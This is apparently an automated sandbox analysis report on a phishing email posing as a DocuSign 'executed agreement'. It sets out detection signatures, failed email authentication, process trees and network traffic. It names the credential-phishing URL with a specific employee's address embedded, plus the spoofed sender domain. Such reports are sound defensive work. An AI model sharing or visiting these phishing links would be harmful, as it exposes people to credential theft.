Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Cardfactory Executed Agreement DocsID- Sign & Review..eml

Overview

General Information

Sample name:Cardfactory Executed Agreement DocsID- Sign & Review..eml
Analysis ID:1590051
MD5:e7cc91082f04f6cb043544acb16d956d
SHA1:cf2306faf9d8a0ceb0f660be78ed5a7ea2630b49
SHA256:8a75407c92926f258feafbdb40d2151a6ac7b078a4f3b2814ccfc39a9a206080
Infos:

Detection

HTMLPhisher
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish10
AI detected potential phishing Email
AI detected suspicious Javascript
AI detected suspicious URL
Email DMARC failed
Email SPF failed
Email DKIM failed
HTML body contains low number of good links
HTML body contains password input but no form action
Invalid T&C link found
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Sigma detected: Outlook Security Settings Updated - Registry
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 3540 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\Cardfactory Executed Agreement DocsID- Sign & Review..eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 7060 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "FA1B455B-8C18-478D-A6CD-1F1502A24A39" "D84ACCC2-56A2-421A-9EDF-DFCFB712F048" "3540" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • Acrobat.exe (PID: 7036 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\VJFSI0W4\Martin.poole-In Service Agreement.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 6220 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 5792 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2144 --field-trial-handle=1568,i,1481551200680613718,7109256928740826586,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 7748 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://docusign.legalcloudfiles.com/S06ga?e=martin.poole@cardfactory.co.uk MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7940 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=1904,i,18398957665999687040,4866373820568723104,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
1.3.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    1.4.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 3540, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
      Source: Registry Key setAuthor: frack113: Data: Details: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\VJFSI0W4\, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 3540, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Security\OutlookSecureTempFolder
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      Phishing

      barindex
      Source: https://docusign.legalcloudfiles.com/S06ga/?e=martin.poole@cardfactory.co.ukJoe Sandbox AI: Score: 8 Reasons: The brand 'Microsoft' is not directly associated with the URL 'docusign.legalcloudfiles.com'., The URL uses 'docusign' as a subdomain, which is a well-known brand for electronic agreements, but the main domain 'legalcloudfiles.com' is not associated with DocuSign., The presence of 'docusign' in the subdomain could be an attempt to mislead users into thinking the site is related to DocuSign., The use of a generic domain 'legalcloudfiles.com' is suspicious and not directly linked to any well-known brand., The input field 'Password' suggests that sensitive information is being requested, which is a common tactic in phishing sites. DOM: 1.4.pages.csv
      Source: Yara matchFile source: 1.3.pages.csv, type: HTML
      Source: Yara matchFile source: 1.4.pages.csv, type: HTML
      Source: EmailJoe Sandbox AI: Detected potential phishing email: Suspicious sender domain 'capitaltractorinc.com' doesn't match the claimed service 'DocsOnline'. Generic document signing subject line combined with unexpected sender is a common phishing tactic. Attachment naming convention attempts to create urgency and appears targeted
      Source: 0.6.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://docusign.legalcloudfiles.com/S06ga/?e=mart... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of the 'astronomy' function to extract and decode a parameter from the URL, and the subsequent assignment of the decoded value to the 'rh13z8jemt' variable, suggests the potential for malicious activity. The script also contains a significant amount of irrelevant and obfuscated text, further raising suspicion. Overall, this script demonstrates a high risk of malicious intent and should be thoroughly investigated.
      Source: URLJoe Sandbox AI: AI detected Brand spoofing attempt in URL: https://docusign.legalcloudfiles.com
      Source: Cardfactory Executed Agreement DocsID- Sign & Review..emlEmail attachement header: Authentication-Results: fail action=oreject header.from=capitaltractorinc.com
      Source: Cardfactory Executed Agreement DocsID- Sign & Review..emlEmail attachement header: Authentication-Results: softfail (sender IP is 198.154.180.197) smtp.mailfrom=capitaltractorinc.com
      Source: Cardfactory Executed Agreement DocsID- Sign & Review..emlEmail attachement header: Authentication-Results: fail (body hash did not verify) header.d=capitaltractorinc-com.20230601.gappssmtp.com
      Source: https://docusign.legalcloudfiles.com/S06ga/?e=martin.poole@cardfactory.co.ukHTTP Parser: Number of links: 0
      Source: https://docusign.legalcloudfiles.com/S06ga/?e=martin.poole@cardfactory.co.ukHTTP Parser: <input type="password" .../> found but no <form action="...
      Source: https://docusign.legalcloudfiles.com/S06ga/?e=martin.poole@cardfactory.co.ukHTTP Parser: Invalid link: Privacy statement
      Source: https://docusign.legalcloudfiles.com/S06ga/?e=martin.poole@cardfactory.co.ukHTTP Parser: Invalid link: Privacy statement
      Source: EmailClassification: Credential Stealer
      Source: https://docusign.legalcloudfiles.com/S06ga/?e=martin.poole@cardfactory.co.ukHTTP Parser: <input type="password" .../> found
      Source: https://docusign.legalcloudfiles.com/S06ga/?e=martin.poole@cardfactory.co.ukHTTP Parser: No favicon
      Source: https://docusign.legalcloudfiles.com/S06ga/?e=martin.poole@cardfactory.co.ukHTTP Parser: No favicon
      Source: https://docusign.legalcloudfiles.com/S06ga/?e=martin.poole@cardfactory.co.ukHTTP Parser: No favicon
      Source: https://docusign.legalcloudfiles.com/S06ga/?e=martin.poole@cardfactory.co.ukHTTP Parser: No favicon
      Source: https://docusign.legalcloudfiles.com/S06ga/?e=martin.poole@cardfactory.co.ukHTTP Parser: No <meta name="author".. found
      Source: https://docusign.legalcloudfiles.com/S06ga/?e=martin.poole@cardfactory.co.ukHTTP Parser: No <meta name="author".. found
      Source: https://docusign.legalcloudfiles.com/S06ga/?e=martin.poole@cardfactory.co.ukHTTP Parser: No <meta name="copyright".. found
      Source: https://docusign.legalcloudfiles.com/S06ga/?e=martin.poole@cardfactory.co.ukHTTP Parser: No <meta name="copyright".. found
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 23.56.162.204
      Source: unknownTCP traffic detected without corresponding DNS query: 23.56.162.204
      Source: unknownTCP traffic detected without corresponding DNS query: 23.56.162.204
      Source: unknownTCP traffic detected without corresponding DNS query: 23.56.162.204
      Source: unknownTCP traffic detected without corresponding DNS query: 23.56.162.204
      Source: unknownTCP traffic detected without corresponding DNS query: 23.56.162.204
      Source: unknownTCP traffic detected without corresponding DNS query: 23.56.162.204
      Source: unknownTCP traffic detected without corresponding DNS query: 23.56.162.204
      Source: unknownTCP traffic detected without corresponding DNS query: 23.56.162.204
      Source: unknownTCP traffic detected without corresponding DNS query: 23.56.162.204
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: docusign.legalcloudfiles.com
      Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: code.jquery.com
      Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
      Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
      Source: global trafficDNS traffic detected: DNS query: 2043758164-1323985617.cos.sa-saopaulo.myqcloud.com
      Source: global trafficDNS traffic detected: DNS query: 2043758164.cloudhostbuilder.com
      Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: classification engineClassification label: mal76.phis.winEML@36/58@42/262
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20250113T0843090639-3540.etl
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile read: C:\Users\desktop.ini
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\Cardfactory Executed Agreement DocsID- Sign & Review..eml"
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "FA1B455B-8C18-478D-A6CD-1F1502A24A39" "D84ACCC2-56A2-421A-9EDF-DFCFB712F048" "3540" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\VJFSI0W4\Martin.poole-In Service Agreement.pdf"
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2144 --field-trial-handle=1568,i,1481551200680613718,7109256928740826586,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://docusign.legalcloudfiles.com/S06ga?e=martin.poole@cardfactory.co.uk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=1904,i,18398957665999687040,4866373820568723104,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\msiexec.exe C:\Windows\System32\MsiExec.exe -Embedding 767B7CA71D2AC1A2E55E08ACABB80F1D
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "FA1B455B-8C18-478D-A6CD-1F1502A24A39" "D84ACCC2-56A2-421A-9EDF-DFCFB712F048" "3540" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\VJFSI0W4\Martin.poole-In Service Agreement.pdf"
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2144 --field-trial-handle=1568,i,1481551200680613718,7109256928740826586,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=1904,i,18398957665999687040,4866373820568723104,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
